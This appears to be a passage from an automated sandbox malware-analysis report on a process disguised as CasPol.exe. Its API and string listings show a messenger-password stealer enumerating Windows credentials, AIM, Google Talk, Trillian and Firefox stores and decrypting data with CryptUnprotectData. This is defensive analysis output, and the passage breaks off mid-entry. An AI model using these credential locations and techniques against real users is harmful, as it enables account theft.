                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a20be75106eef8afbc2690363f5f718c8396ca202439f642d4b7149e4ddfd6d
                                                                                                                                                                                    • Instruction Fuzzy Hash: CD711BB1D0025DAFDB10DFD5CD84AEEBBB8AB48309F5000BBE505B6241D7786A898B58

                                                                                                                                                                                    Control-flow Graph (function at 40bbf0; executed/not-executed block graph not reproduced)
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040BC14
                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 0040BC26
                                                                                                                                                                                    • strrchr.MSVCRT ref: 0040BC35
                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040BC4F
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040BC83
                                                                                                                                                                                    • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040BC94
                                                                                                                                                                                    • GetWindowPlacement.USER32(00000000,?), ref: 0040BCCE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                                                                                                    • String ID: .cfg$General$WinPos
                                                                                                                                                                                    • API String ID: 1012775001-3165880290
                                                                                                                                                                                    • Opcode ID: a0e6ba106d22b7fdb452a0395d51e5079dfe080821a02a89f5daf1cda0cefaef
                                                                                                                                                                                    • Instruction ID: 4d3526ff516950935d38684931a8ffa2e994efc3bce567aa6e3141678cacb11c
                                                                                                                                                                                    • Opcode Fuzzy Hash: a0e6ba106d22b7fdb452a0395d51e5079dfe080821a02a89f5daf1cda0cefaef
                                                                                                                                                                                    • Instruction Fuzzy Hash: AC31B4729042189BDB11DB55DC45BCA77BC9F58704F0400FAE948AB282DBB45FC58FA8

                                                                                                                                                                                    Control-flow Graph (function at 410205; executed/not-executed block graph not reproduced)
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,7701485B,00000000), ref: 00410257
                                                                                                                                                                                    • memset.MSVCRT ref: 004102AA
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,7701485B,00000000), ref: 004102C3
                                                                                                                                                                                    • _strnicmp.MSVCRT ref: 004102DF
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00418AE0,000000FF,?,000000FF,00000000,00000000,?,?,?,?,7701485B,00000000), ref: 0041030D
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,7701485B,00000000), ref: 0041032C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide$CredEnumerate_strnicmpmemset
                                                                                                                                                                                    • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                                                                                                    • API String ID: 4106277485-3589380929
                                                                                                                                                                                    • Opcode ID: 71b69f7c8173fc3aa574efd14f73b3720c8d0a19d14fe5437baa1e670a90085b
                                                                                                                                                                                    • Instruction ID: 25a7ce4e34514ebc1ab433be8417aa6076f8fd68c633d2ab3a6fecdf2bbac582
                                                                                                                                                                                    • Opcode Fuzzy Hash: 71b69f7c8173fc3aa574efd14f73b3720c8d0a19d14fe5437baa1e670a90085b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 59414DB190021EAFDB149F94DD849EEB7BCBF08304F1441AAE915A3251D774EEC4CBA8

                                                                                                                                                                                    Control-flow Graph (function at 40260a; executed/not-executed block graph not reproduced)
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExW.KERNEL32(80000001,Software\America Online\AIM6\Passwords,00000000,00020019,?), ref: 00402638
                                                                                                                                                                                    • memset.MSVCRT ref: 0040265A
                                                                                                                                                                                    • memset.MSVCRT ref: 00402676
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 004026BD
                                                                                                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,?), ref: 0040271B
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402724
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Software\America Online\AIM6\Passwords, xrefs: 0040262E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$CloseEnumOpenValuewcscpy
                                                                                                                                                                                    • String ID: Software\America Online\AIM6\Passwords
                                                                                                                                                                                    • API String ID: 295685061-818317896
                                                                                                                                                                                    • Opcode ID: a6e0e670a062fae4d46a71794003c79dd6e3f5cc49125a91a21113afdc381c0b
                                                                                                                                                                                    • Instruction ID: 88eb4c74892045a3a61c352dacbb2536a85d96596cfce7057c4216d26753dbed
                                                                                                                                                                                    • Opcode Fuzzy Hash: a6e0e670a062fae4d46a71794003c79dd6e3f5cc49125a91a21113afdc381c0b
                                                                                                                                                                                    • Instruction Fuzzy Hash: F5311AB284011DAACB10DF91DC45EEFBBBCEF08344F1040A6A609F2180E77497998FA9

                                                                                                                                                                                    Control-flow Graph (function at 4039a8; executed/not-executed block graph not reproduced)
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _strcmpimemsetsprintf
                                                                                                                                                                                    • String ID: AddExportHeaderLine$Folder%d$MarkOddEvenRows$SaveFilterIndex$ShowGridLines
                                                                                                                                                                                    • API String ID: 1148023869-3238971583
                                                                                                                                                                                    • Opcode ID: 41c6a4aa87f640e3ff617832b964f26cfa69aff41829c8ca8a21bee419e69aaf
                                                                                                                                                                                    • Instruction ID: b4f0ac16e309dff731b59d997bf236358cc0e702142a5422807362b934f22301
                                                                                                                                                                                    • Opcode Fuzzy Hash: 41c6a4aa87f640e3ff617832b964f26cfa69aff41829c8ca8a21bee419e69aaf
                                                                                                                                                                                    • Instruction Fuzzy Hash: A22143717041046BCB19DFA8CC86FAAB7F8BF08705F14446EB44A97181EA78AE848B59

                                                                                                                                                                                    Control-flow Graph (function at 40876f; executed/not-executed block graph not reproduced)
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _mbscpy.MSVCRT(0041E308,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403FEE,MessenPass), ref: 004087EA
                                                                                                                                                                                      • Part of subcall function 00408BF9: _itoa.MSVCRT ref: 00408C1A
                                                                                                                                                                                    • strlen.MSVCRT ref: 00408808
                                                                                                                                                                                    • LoadStringA.USER32(00000000,00000006,?,?), ref: 00408838
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000001), ref: 00408877
                                                                                                                                                                                      • Part of subcall function 004086ED: ??2@YAPAXI@Z.MSVCRT ref: 00408715
                                                                                                                                                                                      • Part of subcall function 004086ED: ??2@YAPAXI@Z.MSVCRT ref: 00408733
                                                                                                                                                                                      • Part of subcall function 004086ED: ??2@YAPAXI@Z.MSVCRT ref: 00408751
                                                                                                                                                                                      • Part of subcall function 004086ED: ??2@YAPAXI@Z.MSVCRT ref: 00408761
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408783
                                                                                                                                                                                    • strings, xrefs: 004087E0
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@$LoadString_itoa_mbscpymemcpystrlen
                                                                                                                                                                                    • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$strings
                                                                                                                                                                                    • API String ID: 4036804644-4125592482
• Opcode ID: ef01070cab15df538a3798e247c3de3082de72e9928e1165ff50cbaae212c905
• Instruction ID: dfb39b5d66abeec2138625290c7fe1e8033edbc7f9ca8f6d480f1a826448875f
• Opcode Fuzzy Hash: ef01070cab15df538a3798e247c3de3082de72e9928e1165ff50cbaae212c905
• Instruction Fuzzy Hash: 60316E3E6001119FD714AF16EE809F63769FB84308794843EEC81A72A6DB39A841CB5E
APIs
  • Part of subcall function 0040FC4F: memset.MSVCRT ref: 0040FC6B
  • Part of subcall function 0040FC4F: memset.MSVCRT ref: 0040FC82
  • Part of subcall function 0040FC4F: _mbscat.MSVCRT ref: 0040FCAD
  • Part of subcall function 0040FC4F: _mbscat.MSVCRT ref: 0040FCD5
• memset.MSVCRT ref: 0040FA77
• strlen.MSVCRT ref: 0040FA8E
• strlen.MSVCRT ref: 0040FA97
• strlen.MSVCRT ref: 0040FAF0
• strlen.MSVCRT ref: 0040FAFE
  • Part of subcall function 00406B4B: _mbscpy.MSVCRT(0040390F,00000000,0040390F,0040D4CE,00000000,Trillian\users\global), ref: 00406B53
  • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
Strings
Memory Dump Source
• Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
Similarity
• API ID: strlen$_mbscatmemset$_mbscpy
• String ID: history.dat$places.sqlite
• API String ID: 29466866-467022611
• Opcode ID: ee6acc930cb9d74bf98811be63a8831f79d7bf82fd0cf47672f2f569cef0fbab
• Instruction ID: 51ac12969def4fbc614ccf7375ed6982ef447687ff00d0a07234f36c10d15357
• Opcode Fuzzy Hash: ee6acc930cb9d74bf98811be63a8831f79d7bf82fd0cf47672f2f569cef0fbab
• Instruction Fuzzy Hash: 7A313271D05118ABDB10EBA5DC85BDDBBB89F01319F1044BBE514F2181DB38AB89CB59
APIs
• memset.MSVCRT ref: 0040FC6B
• memset.MSVCRT ref: 0040FC82
  • Part of subcall function 0041223F: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000000,00000104), ref: 00412279
  • Part of subcall function 0040680E: strlen.MSVCRT ref: 0040680F
  • Part of subcall function 0040680E: _mbscat.MSVCRT ref: 00406826
• _mbscat.MSVCRT ref: 0040FCAD
  • Part of subcall function 0041223F: memset.MSVCRT ref: 00412297
  • Part of subcall function 0041223F: RegCloseKey.ADVAPI32(00000104,?,?,?,?,00000000,00000104), ref: 004122FE
  • Part of subcall function 0041223F: _mbscpy.MSVCRT(00000000,?,?,?,?,?,00000000,00000104), ref: 0041230C
• _mbscat.MSVCRT ref: 0040FCD5
Strings
Memory Dump Source
• Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
Similarity
• API ID: _mbscatmemset$CloseFolderPathSpecial_mbscpystrlen
• String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
• API String ID: 748118687-1174173950
• Opcode ID: 6232208ba1a874a6dfbacdaeb12f5c4e8ca617f07066d97f4b76881872564654
• Instruction ID: 7f5679cf0a8b8ad9b854585c07a42444415b2697a37b1dd070144bca98095891
• Opcode Fuzzy Hash: 6232208ba1a874a6dfbacdaeb12f5c4e8ca617f07066d97f4b76881872564654
• Instruction Fuzzy Hash: 67010CB3D4021C76DB2176655C86FCF7A2C5F60308F0408A6F548B7142D9BC9ED846A9
APIs
  • Part of subcall function 00411D68: RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
• RegCloseKey.KERNEL32(0040D439,?,?,0040D439,?,?,?,?,?,00000000,00000000), ref: 00412167
• GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,?,0040D439,?,?,?,?,?,00000000,00000000), ref: 00412178
• _mbscat.MSVCRT ref: 00412188
  • Part of subcall function 00411D82: RegQueryValueExA.KERNEL32(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B
Strings
• SOFTWARE\Microsoft\Windows\CurrentVersion, xrefs: 00412137
• :\Program Files, xrefs: 0041217E
• ProgramFilesDir, xrefs: 00412150
Memory Dump Source
• Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
Similarity
• API ID: CloseDirectoryOpenQueryValueWindows_mbscat
• String ID: :\Program Files$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion
• API String ID: 3464146404-1099425022
• Opcode ID: c60afe78d3be907601b0948d5127775a3db94f7b53ba6c2000afb81737aee508
• Instruction ID: 662ef04aa31600ef20de70b7cf87d02e8b1ceff17a77a69e12e4cdaece8db846
• Opcode Fuzzy Hash: c60afe78d3be907601b0948d5127775a3db94f7b53ba6c2000afb81737aee508
• Instruction Fuzzy Hash: 2DF0E972508300BFE7119754AD07BCA7FE88F04314F20005BF644A0181FAE96EC0C29D
APIs
  • Part of subcall function 0040733E: free.MSVCRT ref: 00407341
  • Part of subcall function 0040733E: free.MSVCRT ref: 00407349
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000800), ref: 00408661
• _wcslwr.MSVCRT ref: 0040866E
• wcslen.MSVCRT ref: 0040868B
Strings
Memory Dump Source
• Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
Similarity
• API ID: free$ByteCharMultiWide_wcslwrwcslen
• String ID: /$/
• API String ID: 4190021058-2523464752
• Opcode ID: 09d1f8ade8d8357b66a16f8ed5e5d5d855b631777035325b7e6ae659001fd0a0
• Instruction ID: 2a8444091b22e9eb4757945b889b84cf8c338ceadb4b858a9340bcb8d8787785
• Opcode Fuzzy Hash: 09d1f8ade8d8357b66a16f8ed5e5d5d855b631777035325b7e6ae659001fd0a0
• Instruction Fuzzy Hash: 5131A271500109EBDB11EF95CD819EEB3A8BF04345F10857EF585B3280DB78AE858BA8
APIs
  • Part of subcall function 00404109: LoadLibraryA.KERNEL32(advapi32.dll), ref: 00404116
  • Part of subcall function 00404109: GetProcAddress.KERNEL32(00000000,CredReadW,?,?,?,?,?,?,?,?,?,?,?,?,0040DB18,?), ref: 0040412F
  • Part of subcall function 00404109: GetProcAddress.KERNEL32(?,CredFree,?,?,?,?,?,?,?,?,?,?,?,?,0040DB18,?), ref: 0040413B
  • Part of subcall function 00404109: GetProcAddress.KERNEL32(?,CredEnumerateW,?,?,?,?,?,?,?,?,?,?,?,?,0040DB18,?), ref: 00404147
  • Part of subcall function 00404C9D: LoadLibraryA.KERNEL32(crypt32.dll), ref: 00404CAA
  • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData,?,?), ref: 00404CBC
• CredReadW.ADVAPI32(Passport.Net\*,00000004,00000000,?,7701485B), ref: 0040FFCF
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,00000000,?,?,?), ref: 0041005B
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,00000000,?,?,?), ref: 00410071
• LocalFree.KERNEL32(?,?,00000000,?,?,?), ref: 0041007D
Strings
Memory Dump Source
• Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
Similarity
• API ID: AddressProc$ByteCharLibraryLoadMultiWide$CredFreeLocalRead
• String ID: Passport.Net\*
• API String ID: 3146130701-3671122194
• Opcode ID: 4033d74ea8b7e7d1449d062c3a122578251190037a8d9eb515b0a5cc15d38eb4
• Instruction ID: a8053254f1e515f4d897164d33fe2023de59da6d422685d1f9c73d0263123044
• Opcode Fuzzy Hash: 4033d74ea8b7e7d1449d062c3a122578251190037a8d9eb515b0a5cc15d38eb4
• Instruction Fuzzy Hash: 9231F7B1D01129AADB10DF95DC44EDEBBB8FF49750F11406BF610A7250D7789A81CBA8
APIs
  • Part of subcall function 00407C79: memset.MSVCRT ref: 00407CDB
  • Part of subcall function 00407C79: memset.MSVCRT ref: 00407CEF
  • Part of subcall function 00407C79: memset.MSVCRT ref: 00407D09
  • Part of subcall function 00407C79: memset.MSVCRT ref: 00407D1E
  • Part of subcall function 00407C79: GetComputerNameA.KERNEL32(?,?), ref: 00407D40
  • Part of subcall function 00407C79: GetUserNameA.ADVAPI32(?,?), ref: 00407D54
  • Part of subcall function 00407C79: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D73
  • Part of subcall function 00407C79: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D88
  • Part of subcall function 00407C79: strlen.MSVCRT ref: 00407D91
  • Part of subcall function 00407C79: strlen.MSVCRT ref: 00407DA0
  • Part of subcall function 00407C79: memcpy.MSVCRT(?,000000A3,00000010,?,?), ref: 00407DB2
  • Part of subcall function 00411D68: RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
• memset.MSVCRT ref: 00407FCC
  • Part of subcall function 00411DEE: RegEnumKeyExA.KERNEL32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
• memset.MSVCRT ref: 00408019
• RegCloseKey.ADVAPI32(000000FF,?,?,?,?,?,?,?,?,?,?,00000000,000000FF), ref: 00408050
• RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,000000FF), ref: 00408075
Strings
• Software\Google\Google Talk\Accounts, xrefs: 00407F99
Memory Dump Source
• Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
Similarity
• API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
• String ID: Software\Google\Google Talk\Accounts
• API String ID: 2959138223-1079885057
• Opcode ID: a61bd0733ec224b38154a4f2ff7882c534965ab0212f33104a31c91c9fdff71e
• Instruction ID: d1f993f4292481421df56ff24d775a8bf39926e587c7cc16b4fa812e835a0406
• Opcode Fuzzy Hash: a61bd0733ec224b38154a4f2ff7882c534965ab0212f33104a31c91c9fdff71e
• Instruction Fuzzy Hash: CC2131B1D0511DBADF21AB95DD42EEEBB7CAF04744F0000B6FA08B1151E7355B94CBA5
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00412192: LoadLibraryA.KERNEL32(shell32.dll), ref: 004121A0
                                                                                                                                                                                      • Part of subcall function 00412192: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004121B5
                                                                                                                                                                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000000,00000104), ref: 00412279
                                                                                                                                                                                    • memset.MSVCRT ref: 00412297
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000104,?,?,?,?,00000000,00000104), ref: 004122FE
                                                                                                                                                                                    • _mbscpy.MSVCRT(00000000,?,?,?,?,?,00000000,00000104), ref: 0041230C
                                                                                                                                                                                      • Part of subcall function 00406B06: GetVersionExA.KERNEL32(0041E160,?,00406B2F,0040261A), ref: 00406B20
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 004122B2, 004122C2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressCloseFolderLibraryLoadPathProcSpecialVersion_mbscpymemset
                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                    • API String ID: 3929982141-2036018995
                                                                                                                                                                                    • Opcode ID: b96bc5415f4bbcc880d6965b13a9c18158844b12574b3ad0af716ad2c52970d8
                                                                                                                                                                                    • Instruction ID: 8ee396e5f1da91aaa9319efae8cdfa2544b6f7efa6ef91eb3d4b19fa56f42788
                                                                                                                                                                                    • Opcode Fuzzy Hash: b96bc5415f4bbcc880d6965b13a9c18158844b12574b3ad0af716ad2c52970d8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7011DB71800215BBDB24A6985D4A9EE77BCDB05304F1000EBED51F2152D6B89EE4C69E
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@$DeleteIconLoadObject
                                                                                                                                                                                    • String ID: ;@
                                                                                                                                                                                    • API String ID: 1986663749-2925476404
                                                                                                                                                                                    • Opcode ID: 462c25ec0a62c83cd232211add7106b677ed3de08da03debaff4362743836162
                                                                                                                                                                                    • Instruction ID: 4d16bad446557b49ffcede9a37569aa771c04751a2fd478bf3dc9e82e5d405e4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 462c25ec0a62c83cd232211add7106b677ed3de08da03debaff4362743836162
                                                                                                                                                                                    • Instruction Fuzzy Hash: A921AE70900314CBCB50AF6698846D97BA8BB01714F9886BFEC0DAF286CF7855408F68
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00404CE0: FreeLibrary.KERNELBASE(?,00404CA5,00000000,00404771,?,?), ref: 00404CEB
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(crypt32.dll), ref: 00404CAA
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptUnprotectData,?,?), ref: 00404CBC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                    • String ID: CryptUnprotectData$crypt32.dll
                                                                                                                                                                                    • API String ID: 145871493-1827663648
                                                                                                                                                                                    • Opcode ID: 2e6b38e55e542b86b2f912df5b090dd7434b38e1ebb6106688e0ae1187d66704
                                                                                                                                                                                    • Instruction ID: 7870739769311804760c3d1e0253e2144152d34b250ce61cbbba51fe108a7f01
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e6b38e55e542b86b2f912df5b090dd7434b38e1ebb6106688e0ae1187d66704
                                                                                                                                                                                    • Instruction Fuzzy Hash: 01E012B06057108AE7205F76A9057837AD4AB84744F12843EA149E2580D7B8E440C798
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00411CB8
                                                                                                                                                                                      • Part of subcall function 00406F2D: sprintf.MSVCRT ref: 00406F65
                                                                                                                                                                                      • Part of subcall function 00406F2D: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00406F78
                                                                                                                                                                                    • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00411CDC
                                                                                                                                                                                    • memset.MSVCRT ref: 00411CF4
                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(?,?,00417C88,?,00002000,?), ref: 00411D12
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3143880245-0
                                                                                                                                                                                    • Opcode ID: a1c05242f935a5891b0258ea82ebdb7f25e17ebbf36daa8a397953fffb7df0c4
                                                                                                                                                                                    • Instruction ID: 17bc1180ef60d6c0bde436c598d7e35c316bda315ace93708f1b6f060f7ed051
                                                                                                                                                                                    • Opcode Fuzzy Hash: a1c05242f935a5891b0258ea82ebdb7f25e17ebbf36daa8a397953fffb7df0c4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0611A771500219BFDF115F64EC8AEDB3F78EF04754F100066FA09A2151E6358964CBA8
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindResourceA.KERNEL32(?,?,?), ref: 00412098
                                                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 004120A9
                                                                                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 004120B9
                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 004120C4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3473537107-0
                                                                                                                                                                                    • Opcode ID: f941057d9d473a3effe0424e98a75c568b709bef998aca64f808860bd509ea76
                                                                                                                                                                                    • Instruction ID: 6eee99af0fd3847aa000c15d4e464fa532876ff6069f3449b7718533803959f6
                                                                                                                                                                                    • Opcode Fuzzy Hash: f941057d9d473a3effe0424e98a75c568b709bef998aca64f808860bd509ea76
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0101C432600215AB8B158F95DD489DB7F6AFF8A391305C036ED09C6360D770C890C6CC
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040D959
                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040D969
                                                                                                                                                                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0040D989
                                                                                                                                                                                      • Part of subcall function 0040D794: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                                                      • Part of subcall function 0040D794: RegCloseKey.ADVAPI32(00000008), ref: 0040D925
                                                                                                                                                                                      • Part of subcall function 0040D794: RegQueryValueExA.ADVAPI32(?,MainLocation,00000000,?,?,?), ref: 0040D82B
                                                                                                                                                                                      • Part of subcall function 0040D794: atoi.MSVCRT(?), ref: 0040D840
                                                                                                                                                                                      • Part of subcall function 0040D794: memset.MSVCRT ref: 0040D869
                                                                                                                                                                                      • Part of subcall function 0040D794: _mbscpy.MSVCRT(?,?), ref: 0040D8B3
                                                                                                                                                                                      • Part of subcall function 0040D794: _mbscpy.MSVCRT(?,?,?,?), ref: 0040D8C6
                                                                                                                                                                                      • Part of subcall function 0040D794: RegCloseKey.ADVAPI32(?), ref: 0040D8FC
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$Close_mbscpy$DirectoryInformationQueryValueVolumeWindowsatoi
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2578913611-0
                                                                                                                                                                                    • Opcode ID: 5ad718d0a178176aa5508ab2a21a3f8c1d31e3488d15dce6a5d9606b6b3f0dca
